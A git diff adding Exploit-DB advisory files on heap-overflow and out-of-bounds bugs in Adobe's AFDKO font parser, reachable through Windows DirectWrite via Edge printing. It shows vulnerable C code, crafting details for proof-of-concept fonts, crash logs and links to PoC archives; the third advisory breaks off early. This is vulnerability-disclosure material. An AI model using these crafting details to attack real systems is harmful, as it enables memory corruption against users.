+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input.
+
+In this specific case, it might be difficult to reach the vulnerability described here through DirectWrite, because DWrite would first have to accept and correctly load a font collection with a malformed directory count. During our brief testing, we were unable to achieve this. On the other hand, the Windows library still contains the readTTCDirectory() function together with the vulnerable code, so in case the code can be reached in a way we haven't considered, we have opted to report the bug despite its apparent unreachability at this time.
+
+-----=====[ Description ]=====-----
+
+The bug resides in the loading of font collections, i.e. files with the "ttcf" header. Specifically, the problem is found in the readTTCDirectory() function in source/sfntread/sfntread.c:
+
+--- cut ---
+   184      h->TTC.DirectoryCount = read4(h);
+   185      h->TTC.TableDirectory = (long *)memResize(h, h->TTC.TableDirectory,
+   186                                                h->TTC.DirectoryCount * sizeof(long *));
+   187      h->flags |= TTC_STM; /* readSfntDirectory( reads in to h->TTC.TableDirectory[i].directory if TTC_STM is set.*/
+   188
+   189      for (i = 0; i < h->TTC.DirectoryCount; i++) {
+   190          h->TTC.TableDirectory[i] = read4(h) + origin;
+   191      }
+--- cut ---
+
+The DirectoryCount field of type "long" is (almost - depending on the platform) fully controlled by the input file, as initialized in line 184. Then, it is used to calculate the size of a dynamically allocated buffer in line 186. On 32-bit platforms, if the value is equal or larger than 0x40000000, the multiplication will overflow the integer range, resulting in allocating a buffer too small to store the data later written to it by the loop in lines 189-191. This behavior may subsequently lead to heap-based memory corruption.
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file triggers the bug by declaring DirectoryCount as 0x40000001, which results in the allocation of a 4-byte buffer. Since more than one 4-byte offset is loaded from the font, a heap-based buffer overflow takes place in line 190 during the second iteration of the loop.
+
+-----=====[ Crash logs ]=====-----
+
+A crash log from a 32-bit "tx" tool (part of AFDKO) compiled with AddressSanitizer, run as ./tx -cff <path to font file>:
+
+--- cut ---
+=================================================================
+==25409==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf50006f4 at pc 0x08255953 bp 0xffb10ff8 sp 0xffb10ff0
+WRITE of size 4 at 0xf50006f4 thread T0
+    #0 0x8255952 in readTTCDirectory afdko/c/public/lib/source/sfntread/sfntread.c:190:34
+    #1 0x82544fd in sfrBegFont afdko/c/public/lib/source/sfntread/sfntread.c:231:13
+    #2 0x8355234 in readsfnt afdko/c/public/lib/source/tx_shared/tx_shared.c:5118:14
+    #3 0x834f24e in buildFontList afdko/c/public/lib/source/tx_shared/tx_shared.c:5481:25
+    #4 0x8155001 in doFile afdko/c/tx/source/tx.c:403:5
+    #5 0x8152fc9 in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #6 0x81469a6 in parseArgs afdko/c/tx/source/tx.c:558:17
+    #7 0x814263f in main afdko/c/tx/source/tx.c:1631:9
+    #8 0xf7b95275 in __libc_start_main
+    #9 0x806a590 in _start
+
+0xf50006f4 is located 0 bytes to the right of 4-byte region [0xf50006f0,0xf50006f4)
+allocated by thread T0 here:
+    #0 0x810ddc5 in __interceptor_malloc
+    #1 0x833ccaf in mem_manage afdko/c/public/lib/source/tx_shared/tx_shared.c:73:20
+    #2 0x8256bac in memResize afdko/c/public/lib/source/sfntread/sfntread.c:67:18
+    #3 0x82557a1 in readTTCDirectory afdko/c/public/lib/source/sfntread/sfntread.c:185:37
+    #4 0x82544fd in sfrBegFont afdko/c/public/lib/source/sfntread/sfntread.c:231:13
+    #5 0x8355234 in readsfnt afdko/c/public/lib/source/tx_shared/tx_shared.c:5118:14
+    #6 0x834f24e in buildFontList afdko/c/public/lib/source/tx_shared/tx_shared.c:5481:25
+    #7 0x8155001 in doFile afdko/c/tx/source/tx.c:403:5
+    #8 0x8152fc9 in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #9 0x81469a6 in parseArgs afdko/c/tx/source/tx.c:558:17
+    #10 0x814263f in main afdko/c/tx/source/tx.c:1631:9
+    #11 0xf7b95275 in __libc_start_main
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow afdko/c/public/lib/source/sfntread/sfntread.c:190:34 in readTTCDirectory
+Shadow bytes around the buggy address:
+  0x3ea00080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea00090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea000a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea000b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea000c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x3ea000d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[04]fa
+  0x3ea000e0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
+  0x3ea000f0: fa fa 00 fa fa fa 00 00 fa fa fa fa fa fa fa fa
+  0x3ea00100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea00110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea00120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==25409==ABORTING
+--- cut ---
+
+A slightly different crash is generated if we set DirectoryCount to a negative value (e.g. 0x80000000), which skips the loop in lines 189-191 and crashes a bit further down the line:
+
+--- cut ---
+=================================================================
+==26803==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf50006f4 at pc 0x08255d1d bp 0xffee0908 sp 0xffee0900
+READ of size 4 at 0xf50006f4 thread T0
+    #0 0x8255d1c in sfrGetNextTTCOffset afdko/c/public/lib/source/sfntread/sfntread.c:256:12
+    #1 0x835f5dc in addTTC afdko/c/public/lib/source/tx_shared/tx_shared.c:5082:31
+    #2 0x83556d8 in readsfnt afdko/c/public/lib/source/tx_shared/tx_shared.c:5144:21
+    #3 0x834f24e in buildFontList afdko/c/public/lib/source/tx_shared/tx_shared.c:5481:25
+    #4 0x8155001 in doFile afdko/c/tx/source/tx.c:403:5
+    #5 0x8152fc9 in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #6 0x81469a6 in parseArgs afdko/c/tx/source/tx.c:558:17
+    #7 0x814263f in main afdko/c/tx/source/tx.c:1631:9
+    #8 0xf7b0f275 in __libc_start_main
+    #9 0x806a590 in _start
+
+0xf50006f4 is located 0 bytes to the right of 4-byte region [0xf50006f0,0xf50006f4)
+allocated by thread T0 here:
+    #0 0x810ddc5 in __interceptor_malloc
+    #1 0x833ccaf in mem_manage afdko/c/public/lib/source/tx_shared/tx_shared.c:73:20
+    #2 0x8256bac in memResize afdko/c/public/lib/source/sfntread/sfntread.c:67:18
+    #3 0x82557a1 in readTTCDirectory afdko/c/public/lib/source/sfntread/sfntread.c:185:37
+    #4 0x82544fd in sfrBegFont afdko/c/public/lib/source/sfntread/sfntread.c:231:13
+    #5 0x8355234 in readsfnt afdko/c/public/lib/source/tx_shared/tx_shared.c:5118:14
+    #6 0x834f24e in buildFontList afdko/c/public/lib/source/tx_shared/tx_shared.c:5481:25
+    #7 0x8155001 in doFile afdko/c/tx/source/tx.c:403:5
+    #8 0x8152fc9 in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #9 0x81469a6 in parseArgs afdko/c/tx/source/tx.c:558:17
+    #10 0x814263f in main afdko/c/tx/source/tx.c:1631:9
+    #11 0xf7b0f275 in __libc_start_main
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow afdko/c/public/lib/source/sfntread/sfntread.c:256:12 in sfrGetNextTTCOffset
+Shadow bytes around the buggy address:
+  0x3ea00080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea00090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea000a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea000b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea000c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x3ea000d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[04]fa
+  0x3ea000e0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
+  0x3ea000f0: fa fa 00 fa fa fa 00 00 fa fa fa fa fa fa fa fa
+  0x3ea00100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea00110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x3ea00120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==26803==ABORTING
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47096.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47097.txt b/exploits/windows/dos/47097.txt
new file mode 100644
index 000000000..5fd3b93df
--- /dev/null
+++ b/exploits/windows/dos/47097.txt
@@ -0,0 +1,272 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The readFDSelect() function in afdko/c/public/lib/source/cffread/cffread.c is designed to read and parse the FDSelect table of an input OpenType font. It is called by cfrBegFont(), the standard entry point function for the "cfr" (CFF Reader) module of AFDKO. The relevant part of the function is shown below:
+
+--- cut ---
+  2347      switch (read1(h)) {
+  2348          case 0:
+  2349              for (gid = 0; gid < h->glyphs.cnt; gid++)
+  2350                  h->glyphs.array[gid].iFD = read1(h);
+  2351              break;
+  2352          case 3: {
+  2353              int nRanges = read2(h);
+  2354
+  2355              gid = read2(h);
+  2356              while (nRanges--) {
+  2357                  int fd = read1(h);
+  2358                  long next = read2(h);
+  2359
+  2360                  while (gid < next)
+  2361                      h->glyphs.array[gid++].iFD = (unsigned char)fd;
+  2362              }
+  2363          } break;
+--- cut ---
+
+The "iFD" field is an unsigned char, as defined in afdko/c/public/lib/api/absfont.h:
+
+--- cut ---
+   393      unsigned char iFD;                /* CID-keyed: FD index */
+--- cut ---
+
+As shown above, it is initialized directly from the input stream and so the font file has complete control over it. There are no bounds checks to verify if the value is consistent with other structures in the font.
+
+The field is used to store an index into the h->fdicts array, whose size is determined by the length of the FDArray index, see readFDArray():
+
+--- cut ---
+  1698      readINDEX(h, &h->region.FDArrayINDEX, &h->index.FDArray);
+  1699      if (h->index.FDArray.count > 256)
+  1700          fatal(h, cfrErrBadFDArray);
+  1701
+  1702      /* Read FDArray */
+  1703      dnaSET_CNT(h->FDArray, h->index.FDArray.count);
+  1704      dnaSET_CNT(h->fdicts, h->index.FDArray.count);
+--- cut ---
+
+If any of the iFD fields are set to a value exceeding the lengths of the h->FDArray / h->fdicts arrays, the library may access invalid memory in the following locations in code:
+
+--- cut ---
+  2796                  if (h->fdicts.array[info->iFD].Private.LanguageGroup == 1)
+  2797                      info->flags |= ABF_GLYPH_LANG_1;
+[...]
+  2887      t2cAuxData *aux = &h->FDArray.array[info->iFD].aux;
+--- cut ---
+
+The second instance is especially dangerous in the context of memory safety, as the "aux" pointer fetched from an invalid memory location (potentially attacker-controlled) is later extensively used during the Type 2 CharString execution for reading and writing.
+
+As a side note, we believe that the FDArray / fdicts arrays should consist of at least one element for every CID-keyed font, so we would suggest adding an additional check for "h->index.FDArray.count < 1" in the if statement shown below:
+
+--- cut ---
+  1698      readINDEX(h, &h->region.FDArrayINDEX, &h->index.FDArray);
+  1699      if (h->index.FDArray.count > 256)
+  1700          fatal(h, cfrErrBadFDArray);
+--- cut ---
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept file contains a one-element FDArray. It also sets the iFD index of all glyphs to 1, which triggers a slightly out-of-bounds (off by one) access to h->fdicts.array[1] that is easily detected by AddressSanitizer. In non-ASAN builds, the code crashes later on when trying to access an invalid h->FDArray.array[1].aux pointer.
+
+The font is also specially crafted to parse correctly with DirectWrite but trigger the bug in AFDKO. The original CFF2 table was left untouched, and a second copy of it with the modified iFD was inserted at the end of the font with the tag "CFF ". This way, DirectWrite successfully loads the legitimate variable font, and AFDKO processes the modified version as the CFF table takes precedence over CFF2 due to the logic implemented in srcOpen() in afdko/c/public/lib/source/cffread/cffread.c.
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc.otf prints out the following report:
+
+--- cut ---
+=================================================================
+==199139==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62f00000d808 at pc 0x000000529c2c bp 0x7ffd5db0b270 sp 0x7ffd5db0b268
+READ of size 8 at 0x62f00000d808 thread T0
+    #0 0x529c2b in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2796:56
+    #1 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #2 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #3 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #4 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #5 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #6 0x7f10333f82b0 in __libc_start_main
+    #7 0x41e5b9 in _start
+
+0x62f00000d808 is located 2440 bytes to the right of 51840-byte region [0x62f000000400,0x62f00000ce80)
+allocated by thread T0 here:
+    #0 0x4c63f3 in __interceptor_malloc
+    #1 0x6c9ac2 in mem_manage afdko/c/public/lib/source/tx_shared/tx_shared.c:73:20
+    #2 0x5474a4 in dna_manage afdko/c/public/lib/source/cffread/cffread.c:271:17
+    #3 0x7de64e in dnaGrow afdko/c/public/lib/source/dynarr/dynarr.c:86:23
+    #4 0x7dec75 in dnaSetCnt afdko/c/public/lib/source/dynarr/dynarr.c:119:13
+    #5 0x526b21 in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2631:5
+    #6 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #7 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #8 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #9 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #10 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #11 0x7f10333f82b0 in __libc_start_main
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow afdko/c/public/lib/source/cffread/cffread.c:2796:56 in cfrBegFont
+Shadow bytes around the buggy address:
+  0x0c5e7fff9ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c5e7fff9ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c5e7fff9ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c5e7fff9ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c5e7fff9af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x0c5e7fff9b00: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c5e7fff9b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c5e7fff9b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c5e7fff9b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c5e7fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c5e7fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==199139==ABORTING
+--- cut ---
+
+A non-instrumented version of "tx" crashes with a SIGSEGV trying to fetch a function pointer from an unmapped memory area:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x000000000046382f in srcSeek (h=0x7ffffff60188, offset=23445) at ../../../../../source/t2cstr/t2cstr.c:255
+255         if (h->aux->stm->seek(h->aux->stm, h->aux->src, offset))
+
+(gdb) x/15i $rip
+=> 0x46382f <srcSeek+31>:       mov    0x20(%rsi),%rsi
+   0x463833 <srcSeek+35>:       mov    -0x10(%rbp),%rdi
+   0x463837 <srcSeek+39>:       mov    0x9cef8(%rdi),%rdi
+   0x46383e <srcSeek+46>:       mov    0x10(%rdi),%rdi
+   0x463842 <srcSeek+50>:       mov    -0x10(%rbp),%rax
+   0x463846 <srcSeek+54>:       mov    0x9cef8(%rax),%rax
+   0x46384d <srcSeek+61>:       mov    0x8(%rax),%rax
+   0x463851 <srcSeek+65>:       mov    -0x18(%rbp),%rdx
+   0x463855 <srcSeek+69>:       mov    %rsi,-0x20(%rbp)
+   0x463859 <srcSeek+73>:       mov    %rax,%rsi
+   0x46385c <srcSeek+76>:       mov    -0x20(%rbp),%rax
+   0x463860 <srcSeek+80>:       callq  *%rax
+   0x463862 <srcSeek+82>:       cmp    $0x0,%eax
+   0x463865 <srcSeek+85>:       je     0x463877 <srcSeek+103>
+   0x46386b <srcSeek+91>:       movl   $0x1,-0x4(%rbp)
+
+(gdb) info reg $rsi
+rsi            0x440cc00044098000       4903505201673633792
+(gdb) x/10gx $rsi
+0x440cc00044098000:     Cannot access memory at address 0x440cc00044098000
+
+(gdb) print h->aux
+$1 = (t2cAuxData *) 0x7157f8
+(gdb) print h->aux->stm
+$2 = (ctlStreamCallbacks *) 0x440cc00044098000
+(gdb) print h->aux->stm->seek
+Cannot access memory at address 0x440cc00044098020
+
+(gdb) bt
+#0  0x000000000046382f in srcSeek (h=0x7ffffff60188, offset=23445) at ../../../../../source/t2cstr/t2cstr.c:255
+#1  0x000000000045da61 in t2Decode (h=0x7ffffff60188, offset=23445) at ../../../../../source/t2cstr/t2cstr.c:1271
+#2  0x000000000045cb26 in t2cParse (offset=23445, endOffset=23563, aux=0x7157f8, gid=0, cff2=0x715118, glyph=0x6fd6e8, mem=0x7150b8)
+    at ../../../../../source/t2cstr/t2cstr.c:2591
+#3  0x000000000041371f in readGlyph (h=0x710380, gid=0, glyph_cb=0x6fd6e8) at ../../../../../source/cffread/cffread.c:2927
+#4  0x0000000000413495 in cfrIterateGlyphs (h=0x710380, glyph_cb=0x6fd6e8) at ../../../../../source/cffread/cffread.c:2966
+#5  0x0000000000405f11 in cfrReadFont (h=0x6f6010, origin=0, ttcIndex=0) at ../../../../source/tx.c:151
+#6  0x0000000000405c9e in doFile (h=0x6f6010, srcname=0x7fffffffdf1b "poc.otf") at ../../../../source/tx.c:429
+#7  0x000000000040532e in doSingleFileSet (h=0x6f6010, srcname=0x7fffffffdf1b "poc.otf")
+    at ../../../../source/tx.c:488
+#8  0x0000000000402f59 in parseArgs (h=0x6f6010, argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:558
+#9  0x0000000000401df2 in main (argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:1631
+--- cut ---
+
+A similar Microsoft Edge renderer process crash is also shown below:
+
+--- cut ---
+(1838.4490): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!srcSeek+0x21:
+00007ffc`c59f1549 488b4120        mov     rax,qword ptr [rcx+20h] ds:0030002f`00330050=????????????????
+
+DWrite!srcSeek:
+00007ffc`c59f1528 48895c2408      mov     qword ptr [rsp+8],rbx
+00007ffc`c59f152d 57              push    rdi
+00007ffc`c59f152e 4883ec20        sub     rsp,20h
+00007ffc`c59f1532 8bda            mov     ebx,edx
+00007ffc`c59f1534 488bf9          mov     rdi,rcx
+00007ffc`c59f1537 488b91a8f40000  mov     rdx,qword ptr [rcx+0F4A8h]
+00007ffc`c59f153e 448bc3          mov     r8d,ebx
+00007ffc`c59f1541 488b4a10        mov     rcx,qword ptr [rdx+10h]
+00007ffc`c59f1545 488b5208        mov     rdx,qword ptr [rdx+8]
+00007ffc`c59f1549 488b4120        mov     rax,qword ptr [rcx+20h]
+00007ffc`c59f154d ff15edd20200    call    qword ptr [DWrite!_guard_dispatch_icall_fptr (00007ffc`c5a1e840)]
+00007ffc`c59f1553 85c0            test    eax,eax
+00007ffc`c59f1555 7407            je      DWrite!srcSeek+0x36 (00007ffc`c59f155e)
+00007ffc`c59f1557 b801000000      mov     eax,1
+00007ffc`c59f155c eb08            jmp     DWrite!srcSeek+0x3e (00007ffc`c59f1566)
+00007ffc`c59f155e 899f94f40000    mov     dword ptr [rdi+0F494h],ebx
+00007ffc`c59f1564 33c0            xor     eax,eax
+00007ffc`c59f1566 488b5c2430      mov     rbx,qword ptr [rsp+30h]
+00007ffc`c59f156b 4883c420        add     rsp,20h
+00007ffc`c59f156f 5f              pop     rdi
+00007ffc`c59f1570 c3              ret
+
+0:038> db poi(rdi+f4a8)
+0000020c`ffd04170  ee 01 64 00 6f 00 77 00-73 00 2f 00 32 00 30 00  ..d.o.w.s./.2.0.
+0000020c`ffd04180  30 00 33 00 2f 00 30 00-38 00 2f 00 70 00 72 00  0.3./.0.8./.p.r.
+0000020c`ffd04190  69 00 6e 00 74 00 69 00-6e 00 67 00 2f 00 70 00  i.n.t.i.n.g./.p.
+0000020c`ffd041a0  72 00 69 00 6e 00 74 00-73 00 63 00 68 00 65 00  r.i.n.t.s.c.h.e.
+0000020c`ffd041b0  6d 00 61 00 6b 00 65 00-79 00 77 00 6f 00 72 00  m.a.k.e.y.w.o.r.
+0000020c`ffd041c0  64 00 73 00 7d 00 50 00-00 00 67 00 65 00 52 00  d.s.}.P...g.e.R.
+0000020c`ffd041d0  65 00 73 00 6f 00 6c 00-75 00 74 00 69 00 6f 00  e.s.o.l.u.t.i.o.
+0000020c`ffd041e0  6e 00 00 00 00 00 80 3e-00 00 80 3e 00 00 80 3e  n......>...>...>
+
+0:038> k
+ # Child-SP          RetAddr           Call Site
+00 0000008a`e128be10 00007ffc`c59f3fe5 DWrite!srcSeek+0x21
+01 0000008a`e128be40 00007ffc`c59f4a5b DWrite!t2DecodeSubr+0x21
+02 0000008a`e128bea0 00007ffc`c59dc103 DWrite!t2cParse+0x287
+03 0000008a`e129b800 00007ffc`c59de3f7 DWrite!readGlyph+0x12b
+04 0000008a`e129b870 00007ffc`c59d2272 DWrite!cfrIterateGlyphs+0x37
+05 0000008a`e129b8c0 00007ffc`c596157a DWrite!AdobeCFF2Snapshot+0x19a
+06 0000008a`e129bdc0 00007ffc`c5960729 DWrite!FontInstancer::InstanceCffTable+0x212
+07 0000008a`e129bfa0 00007ffc`c596039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+08 0000008a`e129c1c0 00007ffc`c5945a4e DWrite!FontInstancer::CreateInstance+0x192
+09 0000008a`e129c520 00007ffc`d4ae61ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+0a 0000008a`e129c5b0 00007ffc`d4ad9148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+0b 0000008a`e129c6d0 00007ffc`b3ff5464 d2d1!dxc::CXpsPrintControl::Close+0xc8
+0c 0000008a`e129c720 00007ffc`b3fcfd30 edgehtml!CDXPrintControl::Close+0x44
+0d 0000008a`e129c770 00007ffc`b3fd48bd edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+0e 0000008a`e129c7a0 00007ffc`b3eab995 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+0f 0000008a`e129c7d0 00007ffc`b3b09485 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+10 0000008a`e129c810 00007ffc`a3c244c1 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+[...]
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47097.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47098.txt b/exploits/windows/dos/47098.txt
new file mode 100644
index 000000000..65d8418fa
--- /dev/null
+++ b/exploits/windows/dos/47098.txt
@@ -0,0 +1,303 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
